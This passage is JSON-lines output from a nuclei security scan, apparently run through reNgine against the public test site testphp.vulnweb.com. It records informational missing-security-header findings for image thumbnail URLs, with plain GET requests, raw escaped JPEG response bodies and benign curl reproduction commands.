fffde)\\u0018dS\\ufffd\\ufffd\\u001e\\t\\u0019\\ufffd\\u00185\\u001eA\\u001b/{\\\\\\u000e\\ufffdEE\\u003c\\ufffd0\\ufffd\\u001aE\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdEr\\ufffda\\ufffd$\\ufffd\\u0018\\ufffd\\ufffd\\ufffd.\\ufffd\\u0015\\ufffd\\ufffd(\\ufffd\\ufffdu\\ufffd$`\\r7a\\ufffd\\ufffdB\\u0001MU\\u0002\\ufffd{=-\\ufffd}\\ufffd5^\\ufffdq\\ufffd(\\\\7)\\ufffd3Y\\ufffd#\\ufffd5-\\u001e?B\\ufffdoRɑ\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI]\\ufffd\\ufffd;\\ufffdv\\ufffd\\ufffd\\ufffdTG\\ufffd\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd#A\\u001e)\\ufffd\\ufffd|f\\ufffd6+\\ufffd\\ufffd\\ufffdz]\\ufffd\\u0015\\ufffdݴ\\ufffd\\ufffd͆\\ufffd\\ufffdFSϴ\\ufffd\\ufffdmĀ\\ufffd\\n\\u0014}ÀvΐV\\ufffd\\ufffd$\\ufffd\\ufffdE\\ufffd\\ufffd\\u0008\\u001d\\ufffdd\\ufffdz{\\ufffdl\\u00000\\ufffd\\ufffd\\ufffdA\\ufffd\\u0018\\r\\ufffd\\ufffd+\\ufffdS\\ufffd\\u0015\\ufffd\\ufffd\\u0000\\ufffd̈:;U\\ufffd\\u0018\\ufffd\\ufffdo\\ufffdC\\u001e\\ufffd\\ufffd\\u000cH\\u0014\\ufffd9\\u0000\\ufffdnq\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\\\\\ufffdZ\\u0007\\ufffd\\u003cc\\ufffd\\u001f\\u001f\\ufffd{\\ufffdc\\u0012\\ufffd\\u001er\\ufffd\\u001d\\ufffdP\\ufffd@\\ufffd\\ufffdE\\u001c\\ufffd\\ufffd+\\ufffdW\\ufffdk\\ufffd^?\\u0004\\u000f\\ufffd\\ufffdS\\ufffd\\ufffdM\\ufffd\\u00078=\\ufffd\\ufffd\\ufffd\\ufffdHc\\ufffdy\\ufffd\\ufffd S#\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffdo\\ufffd{)$g `\\ufffddR\\ufffd-\\ufffd\\ufffdb\\u0002\\ufffd\\ufffd\\u001d(!^\\ufffd\\ufffdL\\ufffd\\\\\\ufffdZ\\u0005\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd,ņ\\u0006;\\u000cg\\ufffd\\ufffd\\ufffd\\ufffdߨ\\ufffda\\ufffd\\ufffdԗ\\u001af\\ufffd,Q\\ufffdX\\ufffd\\ufffdn\\ufffd\\u0004\\ufffd\\u0000%\\ufffd9\\u0019V\\ufffd;\\ufffd3\\ufffd\\u001cv[\\ufffdk\\u000b)\\ufffdYA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\ufffd\\u0019\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffds~\\u003e\\ufffdc{q$\\ufffd4r\\u0008\\ufffd\\\"\\ufffdIȐ\\ufffd\\u003c\\ufffdKc䚶\\ufffd3Hǽ\\ufffd5\\r\\u0016h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffdAo\\ufffd\\ufffd\\ufffd[WGu\\ufffd\\ufffd\\ufffd\\ufffdjVs\\ufffd(\\ufffd}5\\ufffd.^\\u0010\\ufffd\\u00138bQ@]ː9\\u003c\\ufffd}\\ufffdkg\\ufffd\\u001f\\u0007k.@8a\\ufffd23\\ufffd\\ufffdkJ\\ufffd.\\ufffd\\ufffdӬn.\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffdE\\n\\ufffd\\u001cl\\ufffd\\u0018\\ufffd\\ufffd\\u0000\\ufffd\\ufffdp\\ufffdx\\u003e\\ufffdʫ)\\u0015\\ufffdA\\u001b\\ufffd\\ufffdY$\\ufffd\\ufffd\\ufffdYcm\\ufffdc\\ufffd\\u0018\\\\\\u0000|g\\ufffd{\\ufffd\\ufffdQ\\ufffd\\ufffdԲ\\ufffdYL\\ufffdX\\ufffd\\ufffd\\u0002\\ufffdw/~\\ufffd\\u001c\\ufffd\\ufffd:glz}n\\ufffd\\ufffd\\u0014\\ufffd\\ufffd\\ufffd\\ufffdeWJ\\ufffdn\\ufffd\\u0014QE\\tK\\ufffd\\ufffdS\\ufffd?\\ufffd\\u001e\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd2\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffd~(E\\ufffdh\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffdTl\\ufffd⤢\\ufffd\\u0003eRH\\ufffdv\\ufffd\\ufffd@\\ufffd\\u0004\\ufffd3\\ufffd\\t\\u003ce~\\ufffd\\ufffd\\ufffdW\\u0008\\ufffd\\ufffdvn\\u0018n\\u0001\\ufffdy \\ufffd\\ufffd\\u0012\\u0000\\ufffd\\ufffdG\\u0016\\ufffd\\ufffd)\\ufffd6ޙ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3\\u001b\\ufffd\\ufffd?\\u0014\\ufffd7\\u0002\\u0017\\ufffdl\\ufffd\\ufffdԴ\\ufffd.QU\\ufffd\\ufffdE\\ufffd#\\ufffd~8#8$g\\ufffd\\ufffd\\ufffdޑ-\\ufffd^\\ufffd\\ufffdKp\\ufffd\\ufffd\\ufffdaLͱG~\\u0013;s\\ufffd8\\ufffd'\\ufffdq\\\\\\ufffd􃨮.\\u0012]\\u001a\\ufffd帒\\u0012\\u001a\\u0007 \\ufffdH\\ufffd\\u0014\\ufffd\\u0003\\u0001U\\ufffd\\ufffd'\\ufffd\\u0000'\\u001c\\u000cV\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd%\\t\\u001eb\\ufffdUf\\ufffd;\\u0010\\ufffdX/%w0\\ufffd9\\ufffdk*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4;\\ufffd\\ufffd\\ufffd\\u0015ޒx*!\\ufffd:\\ufffd\\u0019X\\ufffdn\\ufffd^\\ufffd%\\ufffd\\u0001\\ufffd0\\ufffdF\\ufffdI\\ufffd\\ufffd\\u0018\\ufffd\\ufffd8 \\u001c\\ufffd\\ufffdd2\\ufffd\\u0007\\ufffd\\ufffd\\ufffdŧY\\ufffda\\ufffd8\\ufffdt\\ufffd\\ufffdQ\\u0019db\\ufffd\\ufffd\\u0018\\ufffd\\ufffdI\\u0018\\ufffdrN1\\ufffd\\ufffdV8\\ufffd\\u0015\\ufffdQD\\ufffdJv\\ufffd\\ufffd\\ufffd\\u001fUI\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffdK[\\ufffdqf\\ufffd\\ufffd\\ufffd*\\ufffdm\\u0004\\ufffd\\u0019\\ufffd?8\\ufffd#=\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\ufffdI\\ufffdC\\ufffd\\ufffdb\\ufffd\\ufffd\\u001c[\\ufffd\\ufffd#ö\\u003cn\\u0008W\\ufffd\\u0005\\ufffd\\ufffd8 \\ufffd9\\ufffd\\ufffd6IP\\ufffd\\t\\ufffd\\ufffd\\ufffdyq\\u001c\\ufffd\\ufffd7PA\\ufffd\\ufffd=\\ufffd\\ufffd\\u0015\\ufffd0 1\\ufffd+s\\ufffd\\ufffd2\\u0006pO\\ufffd\\ufffd*\\ufffd9.\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd=R\\ufffdd\\u003c\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\u001f\\ufffd\\ufffdl\\ufffd\\ufffd\\ufffd\\u000f\\ufffdț,\\u0008e\\u0000\\ufffdq\\ufffd8$v\\ufffd\\u003cg\\ufffd\\u0017\\ufffdy\\ufffd\\ufffd\\ufffdM\\ufffdҭ\\ufffd./\\ufffd`N@P\\u0019\\ufffd\\u0004\\ufffd\\u00120q\\ufffdۃ\\ufffdv\\u0016\\u001b\\ufffd\\\"\\ufffd\\ufffdŤv2q\\ufffd\\ufffd\\ufffdѩ\\ufffd\\ufffd\\u001eI(\\ufffd\\ufffdez\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd$\\ufffd(?ju\\u0015\\ufffdۨ\\ufffd~iʠS\\ufffd\\ufffdȺ\\u0001 \\ufffdRJŁ\\u0026\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\u0005\\u0001:\\u000b\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003eU\\ufffd\\ufffd\\ufffdߐFA\\u001eA\\\"\\ufffd\\ufffdD\\ufffdV}C\\ufffd\\ufffd\\ufffd\\u0005\\u000c\\ufffd\\ufffd\\ufffdwo'\\ufffd\\ufffd\\u0019'i\\ufffdT\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffdCE֯\\ufffd[\\ufffdu\\ufffdʊ\\ufffd\\ufffd\\ufffdH\\ufffdш\\ufffdq\\ufffd\\u0016\\\\\\ufffd\\u001c3\\u000c\\ufffdj\\u001fX\\ufffd;|\\u003c,6p\\ufffd|\\ufffd\\ufffd\\ufffdON\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdWf\\ufffdڰ.\\ufffdVu \\u0015\\ufffd\\u0006\\u0016@G\\ufffd9\\u003c\\u001e\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGiz\\ufffdŔ:\\ufffd\\ufffdۥ\\ufffd\\ufffd\\ufffdT\\ufffd\\ufffdh\\ufffd\\ufffdz\\ufffd\\ufffd\\u0006=\\ufffdvFs\\ufffdr\\t\\ufffd4\\ufffds^\\ufffd7\\ufffd\\ufffdÝ\\ufffd\\u0011\\ufffdFW\\ufffd\\ufffd\\u003eT\\ufffd\\u000ct\\ufffdV$\\ufffd\\ufffdO\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\u0013\\u0008cc#M\\u0004\\ufffd\\u0019W\\ufffd\\ufffd\\ufffd\\ufffdGܮ\\u001c\\ufffd\\ufffd\\n~r(i\\ufffd\\ufffdjw\\u0006\\u0018Z\\u003c\\ufffd/\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffdx\\u0007\\u0004\\ufffdb21\\ufffd\\ufffdm\\ufffdu\\ufffdXZ\\ufffd*\\ufffdFھ\\ufffd\\ufffd\\u0000ҰEM\\ufffd\\ufffd$*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffdD}\\ufffd\\ufffdRzE\\u0003\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\u001a\\ufffd{\\ufffd0\\ufffd\\ufffd\\ufffds\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd(\\ufffd\\ufffdך\\ufffd\\u00063ڢ\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd\\\"\\ufffd(\\ufffd\\u0008\\ufffd\\ufffd(Bl\\ufffdmEE\\u0015Ġ\\ufffd\\u0006\\ufffd'=袄\\ufffd\\ufffd\\ufffd\\u000e\\ufffdw\\ufffdj\\ufffdwd\\ufffd:\\ufffdY\\u0018e%O(\\ufffdʜv\\ufffd\\u00020@5\\ufffd:\\ufffd6WWqDIX\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffdE\\u0015\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffdߴ\\ufffd+m6\\ufffd\\ufffde\\nč#;rX\\ufffd\\u001e\\ufffdI$\\ufffd\\ufffdw\\ufffd\\u0000\\u0006\\u0000\\ufffd\\\\0\\u0017\\ufffd7\\ufffd\\ufffdU\\u0003\\r\\u0018\\u000b\\ufffd\\ufffd\\u0011\\ufffd\\ufffd9\\u0018\\ufffd\\u0004w\\ufffd\\u003c`\\ufffd\\ufffdȾ$\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffdrțö\\u003e\\ufffdW\\ufffd\\ufffd\\u0013\\ufffdO.\\ufffd=\\ufffdП\\ufffd.\\ufffd\\u0004\\u0001\\ufffd\\ufffdc\\ufffdY!\\n\\ufffd\\ufffdWv\\ufffdv\\ufffd\\u0019e\\u0007\\ufffd\\u0015\\ufffd\\ufffdf\\ufffd\\ufffdӧ\\ufffd\\ufffdmn\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ݑ\\ufffd؁\\ufffd\\ufffd\\u003c`\\ufffd\\ufffd(\\ufffd:\\ufffd\\u0000\\ufffd\\u000f\\ufffdL\\ufffdOd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdigw|\\ufffd\\ufffd)\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u00078\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffd98\\ufffd@\\ufffdE\\u0015\\u0017\\ufffd1\\ufffd\\ufffd\\ufffdE\\ufffd\\u001f`\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\ufffd}\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:42.509937293Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"path\":\"/pictures/2.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"request\":\"GET /pictures/2.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1353\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-549\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001a\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0001\\u0003\\u0004\\u0005\\u0006\\ufffd\\ufffd\\u0000+\\u0010\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0000\\u0004\\u0007\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1AQ\\\"a\\u00142q\\ufffd\\u0005\\u0013$B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0003\\u0001\\u0002\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000'\\u0011\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0001\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1\\u0005Q\\u00132A\\\"#3aq\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffd\\ufffdd\\ufffdH䏺JU\\ufffd\\t\\u000f\\u0008\\ufffdi{\\u0015+f\\ufffd.7\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB6\\ufffd˨\\ufffd\\ufffd\\ufffd\\ufffd͒\\u001bdס\\u001a\\ufffdi\\ufffdE\\ufffdn\\ufffd_\\ufffd\\ufffd%\\u001atN\\u000c\\ufffdpR\\ufffdH\\u001d\\ufffd,֝\\ufffd\\u0000\\u0001 \\u0014\\u0000@'DQ\\u0003\\u0000Qu?b\\ufffd-\\u0010\\u0005\\ufffdL\\u0000\\u0000\\t\\u0000\\u0000\\u0000-\\u0005\\ufffd\\u0001\\ufffd\\ufffd\\u000cH\\ufffd'A\\u0015F\\ufffd\\u001a\\ufffdʔ?z3G\\ufffd^\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdK\\ufffd)\\ufffdۓ\\ufffdl\\ufffd%\\ufffd\\ufffd\\\"䨤\\ufffd\\u001f\\ufffdu\\u0015Ed44\\ufffd2\\u0005\\ufffdS\\ufffdD\\u0002Y\\u0005F\\ufffd`\\u0000\\u0000H\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\r\\u0011L`\\\"\\ufffd)4(\\u000cF\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003%C\\ufffd9\\ufffd\\ufffd1F\\ufffd$\\ufffdc$\\ufffd\\ufffd\\u000f\\ufffd~\\ufffdQ_\\ufffdק{c'K\\ufffd#\\ufffd\\ufffdr|\\ufffdR\\ufffd\\ufffd(\\ufffdԤ\\ufffdI}#;\\ufffd\\ufffdk\\ufffdʚ\\ufffd\\ufffdϳf\\ufffd\\ufffd\\ufffdEmZ\\u0010\\ufffd\\ufffd\\u0012Kȶ\\ufffdА\\ufffd\\ufffdC\\u0001Z\\u001a\\ufffdB\\u0000\\ufffd\\u0006Ҵ1I\\n\\u0004\\ufffd\\u0000X\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\ufffd\\u001com\\ufffd\\u0004\\ufffd,\\ufffd7\\u000e\\ufffd}\\ufffd\\\\1\\ufffd,\\ufffd\\u001f\\u0017\\ufffd\\ufffd#\\ufffdwG\\ufffdϫ\\ufffd\\u0016\\ufffd\\ufffd\\ufffddPf\\ufffd\\u003c\\u0013\\ufffdK\\ufffd\\ufffdG\\ufffd4j\\ufffd\\ufffd\\u001c\\ufffdi\\ufffd$\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffdj\\ufffd4C\\u000b\\ufffd\\ufffd\\ufffdg\\ufffd8\\ufffd`\\ufffd.\\ufffdΜy)\\ufffdN\\ufffd\\ufffd?\\ufffd\\ufffdj\\ufffd\\ufffd\\u001a\\ufffd*\\ufffdw\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd),\\u0012\\ufffd5b\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdg%\\ufffd\\ufffd[7e\\ufffdb\\ufffd\\u001a\\ufffd\\u0000/\\ufffd$\\ufffdfiƎ֛3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdХ\\ufffd5b\\ufffdޥ\\ufffd@%Ţ\\u0008\\u0019v\\u0000\\u0000\\u0000\\u0014E\\u0012\\u0000M\\ufffd(\\ufffd\\u0018\\u0008\\ufffdw1h\\ufffd\\ufffd(\\ufffd\\ufffd\\ufffd\\u001e\\u001a7\\ufffd\\ufffdC\\u001c\\ufffd\\ufffd\\ufffd_\\ufffd\\u000c{,\\ufffd\\ufffdَ[]\\ufffd\\ufffdkp\\ufffd\\ufffdp}\\u001d?ĹI\\ufffd\\ufffd'\\ufffd\\u0026\\ufffdjq\\ufffd\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdWO\\ufffd\\ufffd\\ufffd\\ufffdkV\\ufffd\\ufffd\\ufffd}\\u001bq\\ufffd|\\ufffdc]\\ufffdq5\\u0018\\ufffd\\ufffdp\\u0013\\ufffdJ\\ufffd\\u00003\\ufffd\\ufffd]Fhe\\ufffd\\u0018\\ufffd\\ufffdK\\ufffd4\\ufffd%r}\\ufffd\\ufffdW\\ufffd\\ufffdà\\ufffd\\ufffdd\\ufffdh\\ufffd}\\ufffd\\ufffd-\\ufffd\\\\\\ufffd\\ufffd\\u001c\\ufffdE\\ufffd\\ufffd+B\\ufffd+^\\ufffd4j\\ufffd\\ufffd\\u0004\\u0010\\ufffd}\\ufffd\\u0004\\u000cN\\ufffdqb\\ufffd\\u0000Qe?e`6\\ufffd\\u001b~Ȣې\\ufffd6߲v\\ufffd\\ufffd܄\\u0026\\ufffd\\ufffd\\u0014C\\ufffd\\ufffdJ\\ufffdx\\ufffd\\n\\u003enjlԑ\\ufffd\\ufffd5CEY\\ufffd3\\ufffd\\ufffdj=\\ufffd\\nʱ\\ufffd\\ufffdեj\\ufffdб\\ufffd\\u0000N\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffdp\\ufffd\\ufffd\\ufffdk3\\ufffd\\ufffdҾ\\ufffd9\\ufffd\\ufffd\\ufffd}3t\\ufffd\\ufffd\\ufffdψ\\ufffd2J4\\ufffdN\\rvt\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003e\\ufffdq\\ufffd%\\ufffd\\ufffd\\t\\ufffd\\ufffd\\u001fB\\ufffd\\ufffde\\ufffd\\u001bJ\\ufffd\\u001e\\ufffdQM\\\"(\\ufffd»^,]\\ufffde\\\\FG2k\\ufffdWAC\\ufffd\\r\\ufffd\\ufffd.\\ufffdbPQf\\ufffd\\ufffd\\ufffdt[^\\tP\\ufffd\\ufffdΣ\\ufffd(\\ufffd\\ufffd\\ufffd\\u00126\\ufffd6\\ufffdYlJ\\u0026\\ufffd\\ufffd\\ufffdI\\u0013D\\u003c\\ufffd\\ufffd\\ufffdd\\u0017 \\u0006\\ufffd\\ufffdp2\\ufffd\\u000e\\ufffd\\ufffdm%\\u000e6\\ufffd\\ufffd\\ufffduc\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd}\\ufffd\\ufffd\\u0000\\u001dl*⏝y\\ufffdJ\\u0019\\ufffdK\\ufffdNn\\ufffdN\\u0012x\\ufffd䋤rr%`\\u0006-W\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffdEd(\\ufffd\\u0003!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP\\ufffd8\\ufffd\\ufffdk\\ufffd\\ufffd\\u0005)\\ufffd?,\\u0000+\\ufffd\\ufffd\\ufffd;5\\u0012\\ufffd\\u000c2\\ufffd\\ufffd\\ufffd+\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u0000e\\ufffd2\\ufffd\\t7\\ufffd6-\\\"v\\ufffd\\u0001f\\ufffdd\\ufffd\\u0026ͺXA\\ufffd\\ufffd\\ufffdSh\\u0000~\\ufffd\\\\\\ufffdW\\ufffd\\ufffd\\ufffd%O\\ufffd\\ufffdr\\ufffd\\ufffdc\\u0014\\ufffd\\u0004\\u003eΌ\\u001b\\ufffdCHe\\u0014\\u0000\\u0008\\ufffd\\ufffd\\u0007\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:42.514127312Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"path\":\"/pictures/1.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"request\":\"GET /pictures/1.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4355\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-1103\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0001\\u0005\\u0003\\u0004\\u0007\\u0002\\ufffd\\ufffd\\u00004\\u0010\\u0000\\u0002\\u0001\\u0003\\u0004\\u0001\\u0003\\u0003\\u0003\\u0003\\u0004\\u0001\\u0005\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!1A\\u0006\\u0013Q\\\"a\\ufffd\\u0014q\\ufffd2\\ufffd\\ufffd#BR\\ufffd\\ufffd\\u0016b\\ufffd\\ufffd\\ufffd\